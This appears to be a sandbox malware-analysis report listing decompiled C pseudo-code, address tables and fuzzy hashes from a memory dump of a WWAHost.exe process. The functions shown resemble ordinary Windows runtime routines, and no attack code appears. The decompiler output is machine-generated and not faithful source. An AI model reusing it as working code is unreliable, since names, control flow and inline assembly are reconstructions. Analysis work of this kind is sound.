				_push(__ecx);
				_t36 =  &_v8;
				if(E0398F3D5( &_v8, __edx * _a4, __edx * _a4 >> 0x20) < 0) {
					L10:
					_t22 = 0;
				} else {
					_t24 = _v8 + __ecx;
					_t42 = _t24;
					if(_t24 < __ecx) {
						goto L10;
					} else {
						if(E0398F3D5( &_v8, _a8 * _a12, _a8 * _a12 >> 0x20) < 0) {
							goto L10;
						} else {
							_t29 = _v8 + _t42;
							if(_t29 < _t42) {
								goto L10;
							} else {
								_t47 = _t29;
								_t30 = _a16;
								if(_t30 != 0) {
									 *_t30 = _t47;
								}
								if(_t47 == 0) {
									goto L10;
								} else {
									_t22 = L03974620(_t36,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t47);
								}
							}
						}
					}
				}
				return _t22;
			}










                                              0x03967672
                                              0x0396767f
                                              0x03967689
                                              0x039676de
                                              0x039676de
                                              0x0396768b
                                              0x03967691
                                              0x03967693
                                              0x03967697
                                              0x00000000
                                              0x03967699
                                              0x039676a8
                                              0x00000000
                                              0x039676aa
                                              0x039676ad
                                              0x039676b1
                                              0x00000000
                                              0x039676b3
                                              0x039676b3
                                              0x039676b5
                                              0x039676ba
                                              0x039676bc
                                              0x039676bc
                                              0x039676c0
                                              0x00000000
                                              0x039676c2
                                              0x039676ce
                                              0x039676ce
                                              0x039676c0
                                              0x039676b1
                                              0x039676a8
                                              0x03967697
                                              0x039676d9

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                              • Instruction ID: 7fbf2103a46577f8761787f70b2e64ebbcef07cb3cc422efdf9b95e4fcc97f70
                                              • Opcode Fuzzy Hash: 0f0f9780e106b949b133bc76075252866a2fc865c05abd63e27a9356099b865c
                                              • Instruction Fuzzy Hash: 1B018832702119ABC720FE9EDC41E5BF7ADFB847A4B140524B909CF250DA30DD0187A1
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03959080 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 69%
                                              			E03959080(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi) {
				intOrPtr* _t51;
				intOrPtr _t59;
				signed int _t64;
				signed int _t67;
				signed int* _t71;
				signed int _t74;
				signed int _t77;
				signed int _t82;
				intOrPtr* _t84;
				void* _t85;
				intOrPtr* _t87;
				void* _t94;
				signed int _t95;
				intOrPtr* _t97;
				signed int _t99;
				signed int _t102;
				void* _t104;

				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t97 = __ecx;
				_t102 =  *(__ecx + 0x14);
				if((_t102 & 0x02ffffff) == 0x2000000) {
					_t102 = _t102 | 0x000007d0;
				}
				_t48 =  *[fs:0x30];
				if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
					_t102 = _t102 & 0xff000000;
				}
				_t80 = 0x3a485ec;
				E03972280(_t48, 0x3a485ec);
				_t51 =  *_t97 + 8;
				if( *_t51 != 0) {
					L6:
					return E0396FFB0(_t80, _t97, _t80);
				} else {
					 *(_t97 + 0x14) = _t102;
					_t84 =  *0x3a4538c; // 0x77576888
					if( *_t84 != 0x3a45388) {
						_t85 = 3;
						asm("int 0x29");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(0x2c);
						_push(0x3a2f6e8);
						E039AD0E8(0x3a485ec, _t97, _t102);
						 *((char*)(_t104 - 0x1d)) = 0;
						_t99 =  *(_t104 + 8);
						__eflags = _t99;
						if(_t99 == 0) {
							L13:
							__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
							if(__eflags == 0) {
								E03A288F5(_t80, _t85, 0x3a45388, _t99, _t102, __eflags);
							}
						} else {
							__eflags = _t99 -  *0x3a486c0; // 0xb507b0
							if(__eflags == 0) {
								goto L13;
							} else {
								__eflags = _t99 -  *0x3a486b8; // 0x0
								if(__eflags == 0) {
									goto L13;
								} else {
									_t59 =  *((intOrPtr*)( *[fs:0x30] + 0xc));
									__eflags =  *((char*)(_t59 + 0x28));
									if( *((char*)(_t59 + 0x28)) == 0) {
										E03972280(_t99 + 0xe0, _t99 + 0xe0);
										 *(_t104 - 4) =  *(_t104 - 4) & 0x00000000;
										__eflags =  *((char*)(_t99 + 0xe5));
										if(__eflags != 0) {
											E03A288F5(0x3a485ec, _t85, 0x3a45388, _t99, _t102, __eflags);
										} else {
											__eflags =  *((char*)(_t99 + 0xe4));
											if( *((char*)(_t99 + 0xe4)) == 0) {
												 *((char*)(_t99 + 0xe4)) = 1;
												_push(_t99);
												_push( *((intOrPtr*)(_t99 + 0x24)));
												E0399AFD0();
											}
											while(1) {
												_t71 = _t99 + 8;
												 *(_t104 - 0x2c) = _t71;
												_t80 =  *_t71;
												_t95 = _t71[1];
												 *(_t104 - 0x28) = _t80;
												 *(_t104 - 0x24) = _t95;
												while(1) {
													L19:
													__eflags = _t95;
													if(_t95 == 0) {
														break;
													}
													_t102 = _t80;
													 *(_t104 - 0x30) = _t95;
													 *(_t104 - 0x24) = _t95 - 1;
													asm("lock cmpxchg8b [edi]");
													_t80 = _t102;
													 *(_t104 - 0x28) = _t80;
													 *(_t104 - 0x24) = _t95;
													__eflags = _t80 - _t102;
													_t99 =  *(_t104 + 8);
													if(_t80 != _t102) {
														continue;
													} else {
														__eflags = _t95 -  *(_t104 - 0x30);
														if(_t95 !=  *(_t104 - 0x30)) {
															continue;
														} else {
															__eflags = _t95;
															if(_t95 != 0) {
																_t74 = 0;
																 *(_t104 - 0x34) = 0;
																_t102 = 0;
																__eflags = 0;
																while(1) {
																	 *(_t104 - 0x3c) = _t102;
																	__eflags = _t102 - 3;
																	if(_t102 >= 3) {
																		break;
																	}
																	__eflags = _t74;
																	if(_t74 != 0) {
																		L49:
																		_t102 =  *_t74;
																		__eflags = _t102;
																		if(_t102 != 0) {
																			_t102 =  *(_t102 + 4);
																			__eflags = _t102;
																			if(_t102 != 0) {
																				 *0x3a4b1e0(_t74, _t99);
																				 *_t102();
																			}
																		}
																		do {
																			_t71 = _t99 + 8;
																			 *(_t104 - 0x2c) = _t71;
																			_t80 =  *_t71;
																			_t95 = _t71[1];
																			 *(_t104 - 0x28) = _t80;
																			 *(_t104 - 0x24) = _t95;
																			goto L19;
																		} while (_t74 == 0);
																		goto L49;
																	} else {
																		_t82 = 0;
																		__eflags = 0;
																		while(1) {
																			 *(_t104 - 0x38) = _t82;
																			__eflags = _t82 -  *0x3a484c0;
																			if(_t82 >=  *0x3a484c0) {
																				break;
																			}
																			__eflags = _t74;
																			if(_t74 == 0) {
																				_t77 = E03A29063(_t82 * 0xc +  *((intOrPtr*)(_t99 + 0x10 + _t102 * 4)), _t95, _t99);
																				__eflags = _t77;
																				if(_t77 == 0) {
																					_t74 = 0;
																					__eflags = 0;
																				} else {
																					_t74 = _t77 + 0xfffffff4;
																				}
																				 *(_t104 - 0x34) = _t74;
																				_t82 = _t82 + 1;
																				continue;
																			}
																			break;
																		}
																		_t102 = _t102 + 1;
																		continue;
																	}
																	goto L20;
																}
																__eflags = _t74;
															}
														}
													}
													break;
												}
												L20:
												 *((intOrPtr*)(_t99 + 0xf4)) =  *((intOrPtr*)(_t104 + 4));
												 *((char*)(_t99 + 0xe5)) = 1;
												 *((char*)(_t104 - 0x1d)) = 1;
												goto L21;
											}
										}
										L21:
										 *(_t104 - 4) = 0xfffffffe;
										E0395922A(_t99);
										_t64 = E03977D50();
										__eflags = _t64;
										if(_t64 != 0) {
											_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
										} else {
											_t67 = 0x7ffe0386;
										}
										__eflags =  *_t67;
										if( *_t67 != 0) {
											_t67 = E03A28B58(_t99);
										}
										__eflags =  *((char*)(_t104 - 0x1d));
										if( *((char*)(_t104 - 0x1d)) != 0) {
											__eflags = _t99 -  *0x3a486c0; // 0xb507b0
											if(__eflags != 0) {
												__eflags = _t99 -  *0x3a486b8; // 0x0
												if(__eflags == 0) {
													_t94 = 0x3a486bc;
													_t87 = 0x3a486b8;
													goto L27;
												} else {
													__eflags = _t67 | 0xffffffff;
													asm("lock xadd [edi], eax");
													if(__eflags == 0) {
														E03959240(_t80, _t99, _t99, _t102, __eflags);
													}
												}
											} else {
												_t94 = 0x3a486c4;
												_t87 = 0x3a486c0;
												L27:
												E03989B82(_t80, _t87, _t94, _t99, _t102, __eflags);
											}
										}
									} else {
										goto L13;
									}
								}
							}
						}
						return E039AD130(_t80, _t99, _t102);
					} else {
						 *_t51 = 0x3a45388;
						 *((intOrPtr*)(_t51 + 4)) = _t84;
						 *_t84 = _t51;
						 *0x3a4538c = _t51;
						goto L6;
					}
				}
			}




















                                              0x03959082
                                              0x03959083
                                              0x03959084
                                              0x03959085
                                              0x03959087
                                              0x03959096
                                              0x03959098
                                              0x03959098
                                              0x0395909e
                                              0x039590a8
                                              0x039590e7
                                              0x039590e7
                                              0x039590aa
                                              0x039590b0
                                              0x039590b7
                                              0x039590bd
                                              0x039590dd
                                              0x039590e6
                                              0x039590bf
                                              0x039590bf
                                              0x039590c7
                                              0x039590cf
                                              0x039590f1
                                              0x039590f2
                                              0x039590f4
                                              0x039590f5
                                              0x039590f6
                                              0x039590f7
                                              0x039590f8
                                              0x039590f9
                                              0x039590fa
                                              0x039590fb
                                              0x039590fc
                                              0x039590fd
                                              0x039590fe
                                              0x039590ff
                                              0x03959100
                                              0x03959102
                                              0x03959107
                                              0x0395910c
                                              0x03959110
                                              0x03959113
                                              0x03959115
                                              0x03959136
                                              0x0395913f
                                              0x03959143
                                              0x039b37e4
                                              0x039b37e4
                                              0x03959117
                                              0x03959117
                                              0x0395911d
                                              0x00000000
                                              0x0395911f
                                              0x0395911f
                                              0x03959125
                                              0x00000000
                                              0x03959127
                                              0x0395912d
                                              0x03959130
                                              0x03959134
                                              0x03959158
                                              0x0395915d
                                              0x03959161
                                              0x03959168
                                              0x039b3715
                                              0x0395916e
                                              0x0395916e
                                              0x03959175
                                              0x03959177
                                              0x0395917e
                                              0x0395917f
                                              0x03959182
                                              0x03959182
                                              0x03959187
                                              0x03959187
                                              0x0395918a
                                              0x0395918d
                                              0x0395918f
                                              0x03959192
                                              0x03959195
                                              0x03959198
                                              0x03959198
                                              0x03959198
                                              0x0395919a
                                              0x00000000
                                              0x00000000
                                              0x039b371f
                                              0x039b3721
                                              0x039b3727
                                              0x039b372f
                                              0x039b3733
                                              0x039b3735
                                              0x039b3738
                                              0x039b373b
                                              0x039b373d
                                              0x039b3740
                                              0x00000000
                                              0x039b3746
                                              0x039b3746
                                              0x039b3749
                                              0x00000000
                                              0x039b374f
                                              0x039b374f
                                              0x039b3751
                                              0x039b3757
                                              0x039b3759
                                              0x039b375c
                                              0x039b375c
                                              0x039b375e
                                              0x039b375e
                                              0x039b3761
                                              0x039b3764
                                              0x00000000
                                              0x00000000
                                              0x039b3766
                                              0x039b3768
                                              0x039b37a3
                                              0x039b37a3
                                              0x039b37a5
                                              0x039b37a7
                                              0x039b37ad
                                              0x039b37b0
                                              0x039b37b2
                                              0x039b37bc
                                              0x039b37c2
                                              0x039b37c2
                                              0x039b37b2
                                              0x03959187
                                              0x03959187
                                              0x0395918a
                                              0x0395918d
                                              0x0395918f
                                              0x03959192
                                              0x03959195
                                              0x00000000
                                              0x03959195
                                              0x00000000
                                              0x039b376a
                                              0x039b376a
                                              0x039b376a
                                              0x039b376c
                                              0x039b376c
                                              0x039b376f
                                              0x039b3775
                                              0x00000000
                                              0x00000000
                                              0x039b3777
                                              0x039b3779
                                              0x039b3782
                                              0x039b3787
                                              0x039b3789
                                              0x039b3790
                                              0x039b3790
                                              0x039b378b
                                              0x039b378b
                                              0x039b378b
                                              0x039b3792
                                              0x039b3795
                                              0x00000000
                                              0x039b3795
                                              0x00000000
                                              0x039b3779
                                              0x039b3798
                                              0x00000000
                                              0x039b3798
                                              0x00000000
                                              0x039b3768
                                              0x039b379b
                                              0x039b379b
                                              0x039b3751
                                              0x039b3749
                                              0x00000000
                                              0x039b3740
                                              0x039591a0
                                              0x039591a3
                                              0x039591a9
                                              0x039591b0
                                              0x00000000
                                              0x039591b0
                                              0x03959187
                                              0x039591b4
                                              0x039591b4
                                              0x039591bb
                                              0x039591c0
                                              0x039591c5
                                              0x039591c7
                                              0x039b37da
                                              0x039591cd
                                              0x039591cd
                                              0x039591cd
                                              0x039591d2
                                              0x039591d5
                                              0x03959239
                                              0x03959239
                                              0x039591d7
                                              0x039591db
                                              0x039591e1
                                              0x039591e7
                                              0x039591fd
                                              0x03959203
                                              0x0395921e
                                              0x03959223
                                              0x00000000
                                              0x03959205
                                              0x03959205
                                              0x03959208
                                              0x0395920c
                                              0x03959214
                                              0x03959214
                                              0x0395920c
                                              0x039591e9
                                              0x039591e9
                                              0x039591ee
                                              0x039591f3
                                              0x039591f3
                                              0x039591f3
                                              0x039591e7
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03959134
                                              0x03959125
                                              0x0395911d
                                              0x0395914e
                                              0x039590d1
                                              0x039590d1
                                              0x039590d3
                                              0x039590d6
                                              0x039590d8
                                              0x00000000
                                              0x039590d8
                                              0x039590cf

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 207678e7ee80b73f47161955144a93fc80300a7aa24051487a9e37c0713fb5c6
                                              • Instruction ID: 5c88483bc9e92b83fd0a97f27435218b801e663e1b40f5a960ecd5047de0000e
                                              • Opcode Fuzzy Hash: 207678e7ee80b73f47161955144a93fc80300a7aa24051487a9e37c0713fb5c6
                                              • Instruction Fuzzy Hash: B9018177901604CFD319DF28D840B21BBEDEB86761F294466E905CB691D375EC81CBA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039EC450 Relevance: .1, Instructions: 53COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 46%
                                              			E039EC450(intOrPtr* _a4) {
				signed char _t25;
				intOrPtr* _t26;
				intOrPtr* _t27;

				_t26 = _a4;
				_t25 =  *(_t26 + 0x10);
				if((_t25 & 0x00000003) != 1) {
					_push(0);
					_push(0);
					_push(0);
					_push( *((intOrPtr*)(_t26 + 8)));
					_push(0);
					_push( *_t26);
					E03999910();
					_t25 =  *(_t26 + 0x10);
				}
				if((_t25 & 0x00000001) != 0) {
					_push(4);
					_t7 = _t26 + 4; // 0x4
					_t27 = _t7;
					_push(_t27);
					_push(5);
					_push(0xfffffffe);
					E039995B0();
					if( *_t27 != 0) {
						_push( *_t27);
						E039995D0();
					}
				}
				_t8 = _t26 + 0x14; // 0x14
				if( *((intOrPtr*)(_t26 + 8)) != _t8) {
					L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t26 + 8)));
				}
				_push( *_t26);
				E039995D0();
				return L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t26);
			}






                                              0x039ec458
                                              0x039ec45d
                                              0x039ec466
                                              0x039ec468
                                              0x039ec469
                                              0x039ec46a
                                              0x039ec46b
                                              0x039ec46e
                                              0x039ec46f
                                              0x039ec471
                                              0x039ec476
                                              0x039ec476
                                              0x039ec47c
                                              0x039ec47e
                                              0x039ec480
                                              0x039ec480
                                              0x039ec483
                                              0x039ec484
                                              0x039ec486
                                              0x039ec488
                                              0x039ec48f
                                              0x039ec491
                                              0x039ec493
                                              0x039ec493
                                              0x039ec48f
                                              0x039ec498
                                              0x039ec49e
                                              0x039ec4ad
                                              0x039ec4ad
                                              0x039ec4b2
                                              0x039ec4b4
                                              0x039ec4cd

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID: InitializeThunk
                                              • String ID:
                                              • API String ID: 2994545307-0
                                              • Opcode ID: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                              • Instruction ID: b53a8fd45a51bd6ea3790975f4ae009c1af666016382ece94a226233bfaf79a7
                                              • Opcode Fuzzy Hash: efb8dbafbc21be99c6828cd6b94329c97088fdc8e1727ade4875afce538aa955
                                              • Instruction Fuzzy Hash: DC019276140605BFEB22EF69CC80EA3F77DFF94391F044529F155465A0DB31ACA1CAA0
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A24015 Relevance: .0, Instructions: 49COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E03A24015(signed int __eax, signed int __ecx) {
				void* __ebx;
				void* __edi;
				signed char _t10;
				signed int _t28;

				_push(__ecx);
				_t28 = __ecx;
				asm("lock xadd [edi+0x24], eax");
				_t10 = (__eax | 0xffffffff) - 1;
				if(_t10 == 0) {
					_t1 = _t28 + 0x1c; // 0x1e
					E03972280(_t10, _t1);
					 *((intOrPtr*)(_t28 + 0x20)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
					E03972280( *((intOrPtr*)( *[fs:0x18] + 0x24)), 0x3a486ac);
					E0395F900(0x3a486d4, _t28);
					E0396FFB0(0x3a486ac, _t28, 0x3a486ac);
					 *((intOrPtr*)(_t28 + 0x20)) = 0;
					E0396FFB0(0, _t28, _t1);
					_t18 =  *((intOrPtr*)(_t28 + 0x94));
					if( *((intOrPtr*)(_t28 + 0x94)) != 0) {
						L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t18);
					}
					_t10 = L039777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t28);
				}
				return _t10;
			}







                                              0x03a2401a
                                              0x03a2401e
                                              0x03a24023
                                              0x03a24028
                                              0x03a24029
                                              0x03a2402b
                                              0x03a2402f
                                              0x03a24043
                                              0x03a24046
                                              0x03a24051
                                              0x03a24057
                                              0x03a2405f
                                              0x03a24062
                                              0x03a24067
                                              0x03a2406f
                                              0x03a2407c
                                              0x03a2407c
                                              0x03a2408c
                                              0x03a2408c
                                              0x03a24097

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ffb8bb62f7ec83b3d11e06978beec3fb9885733c11e8f19198c4660bbfc7126c
                                              • Instruction ID: 9d6da37dfffcd1199dbc7ca07be23cadda2ba8f7f14601bf37ed459ea943bb7c
                                              • Opcode Fuzzy Hash: ffb8bb62f7ec83b3d11e06978beec3fb9885733c11e8f19198c4660bbfc7126c
                                              • Instruction Fuzzy Hash: AC0188752016497FC251EB6DCD80E57F7ACFBC5750B000615B50887A51DB78EC51C6E4
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A1138A Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 61%
                                              			E03A1138A(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x3a4d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0399FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1033;
				if(E03977D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0399B640(E03999AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                              0x03a1138a
                                              0x03a1138a
                                              0x03a11399
                                              0x03a113a3
                                              0x03a113a8
                                              0x03a113aa
                                              0x03a113b5
                                              0x03a113bb
                                              0x03a113c3
                                              0x03a113c6
                                              0x03a113c9
                                              0x03a113d4
                                              0x03a113e6
                                              0x03a113d6
                                              0x03a113df
                                              0x03a113df
                                              0x03a113f1
                                              0x03a113f2
                                              0x03a113f4
                                              0x03a113f9
                                              0x03a1140e

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: e4b771cf117b8272694d98581520c614ddec63feb7ccfa43692455d98fe283f2
                                              • Instruction ID: 010dd93d784f3a2f4ae72d2f325db7e256643972f21d182d25b19aadb3d896a5
                                              • Opcode Fuzzy Hash: e4b771cf117b8272694d98581520c614ddec63feb7ccfa43692455d98fe283f2
                                              • Instruction Fuzzy Hash: B1015275A01318AFDB14EFA9D841EAEB7B8EF84710F00405BB905EB280E6749A11C794
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A114FB Relevance: .0, Instructions: 48COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 61%
                                              			E03A114FB(intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v54;
				char _v60;
				void* __edi;
				void* __esi;
				signed char* _t21;
				intOrPtr _t27;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;

				_t32 = __edx;
				_t27 = __ebx;
				_v8 =  *0x3a4d360 ^ _t35;
				_t33 = __edx;
				_t34 = __ecx;
				E0399FA60( &_v60, 0, 0x30);
				_v20 = _a4;
				_v16 = _a8;
				_v28 = _t34;
				_v24 = _t33;
				_v54 = 0x1034;
				if(E03977D50() == 0) {
					_t21 = 0x7ffe0388;
				} else {
					_t21 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
				}
				_push( &_v60);
				_push(0x10);
				_push(0x20402);
				_push( *_t21 & 0x000000ff);
				return E0399B640(E03999AE0(), _t27, _v8 ^ _t35, _t32, _t33, _t34);
			}

















                                              0x03a114fb
                                              0x03a114fb
                                              0x03a1150a
                                              0x03a11514
                                              0x03a11519
                                              0x03a1151b
                                              0x03a11526
                                              0x03a1152c
                                              0x03a11534
                                              0x03a11537
                                              0x03a1153a
                                              0x03a11545
                                              0x03a11557
                                              0x03a11547
                                              0x03a11550
                                              0x03a11550
                                              0x03a11562
                                              0x03a11563
                                              0x03a11565
                                              0x03a1156a
                                              0x03a1157f

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 24d101056bff7a0e50afd2f735197b726b9934154b5712603192920519cd4f15
                                              • Instruction ID: 19a150fdb4f60ec8c08c04898a4e70ba516b40f408c7df3ce3cf3e0745da8fcf
                                              • Opcode Fuzzy Hash: 24d101056bff7a0e50afd2f735197b726b9934154b5712603192920519cd4f15
                                              • Instruction Fuzzy Hash: BA019275A01348AFDB10EFA8D841EAEB7B8EF84710F00405BF905EB380E675DA00CB94
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 039558EC Relevance: .0, Instructions: 47COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			E039558EC(intOrPtr __ecx) {
				signed int _v8;
				char _v28;
				char _v44;
				char _v76;
				void* __edi;
				void* __esi;
				intOrPtr _t10;
				intOrPtr _t16;
				intOrPtr _t17;
				intOrPtr _t27;
				intOrPtr _t28;
				signed int _t29;

				_v8 =  *0x3a4d360 ^ _t29;
				_t10 =  *[fs:0x30];
				_t27 = __ecx;
				if(_t10 == 0) {
					L6:
					_t28 = 0x3935c80;
				} else {
					_t16 =  *((intOrPtr*)(_t10 + 0x10));
					if(_t16 == 0) {
						goto L6;
					} else {
						_t28 =  *((intOrPtr*)(_t16 + 0x3c));
					}
				}
				if(E03955943() != 0 &&  *0x3a45320 > 5) {
					E039D7B5E( &_v44, _t27);
					_t22 =  &_v28;
					E039D7B5E( &_v28, _t28);
					_t11 = E039D7B9C(0x3a45320, 0x393bf15,  &_v28, _t22, 4,  &_v76);
				}
				return E0399B640(_t11, _t17, _v8 ^ _t29, 0x393bf15, _t27, _t28);
			}















                                              0x039558fb
                                              0x039558fe
                                              0x03955906
                                              0x0395590a
                                              0x0395593c
                                              0x0395593c
                                              0x0395590c
                                              0x0395590c
                                              0x03955911
                                              0x00000000
                                              0x03955913
                                              0x03955913
                                              0x03955913
                                              0x03955911
                                              0x0395591d
                                              0x039b1035
                                              0x039b103c
                                              0x039b103f
                                              0x039b1056
                                              0x039b1056
                                              0x0395593b

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f3b6713127b5459aaf9a15a0ce495e6015aec7968caed0fdf318d33a4245d12e
                                              • Instruction ID: 24f3fe0d2da8f310fd929b07e870184e0fd33227959f91702334310b1eba0cde
                                              • Opcode Fuzzy Hash: f3b6713127b5459aaf9a15a0ce495e6015aec7968caed0fdf318d33a4245d12e
                                              • Instruction Fuzzy Hash: 5701A775A002089BC714EF69D8219BEB7ACEFC6170F9A4069FC069B245EF34ED46C790
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0396B02A Relevance: .0, Instructions: 46COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 100%
                                              			E0396B02A(intOrPtr __ecx, signed short* __edx, short _a4) {
				signed char _t11;
				signed char* _t12;
				intOrPtr _t24;
				signed short* _t25;

				_t25 = __edx;
				_t24 = __ecx;
				_t11 = ( *[fs:0x30])[0x50];
				if(_t11 != 0) {
					if( *_t11 == 0) {
						goto L1;
					}
					_t12 = ( *[fs:0x30])[0x50] + 0x22a;
					L2:
					if( *_t12 != 0) {
						_t12 =  *[fs:0x30];
						if((_t12[0x240] & 0x00000004) == 0) {
							goto L3;
						}
						if(E03977D50() == 0) {
							_t12 = 0x7ffe0385;
						} else {
							_t12 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t12 & 0x00000020) == 0) {
							goto L3;
						}
						return E039D7016(_a4, _t24, 0, 0, _t25, 0);
					}
					L3:
					return _t12;
				}
				L1:
				_t12 = 0x7ffe0384;
				goto L2;
			}







                                              0x0396b037
                                              0x0396b039
                                              0x0396b03b
                                              0x0396b040
                                              0x039ba60e
                                              0x00000000
                                              0x00000000
                                              0x039ba61d
                                              0x0396b04b
                                              0x0396b04e
                                              0x039ba627
                                              0x039ba634
                                              0x00000000
                                              0x00000000
                                              0x039ba641
                                              0x039ba653
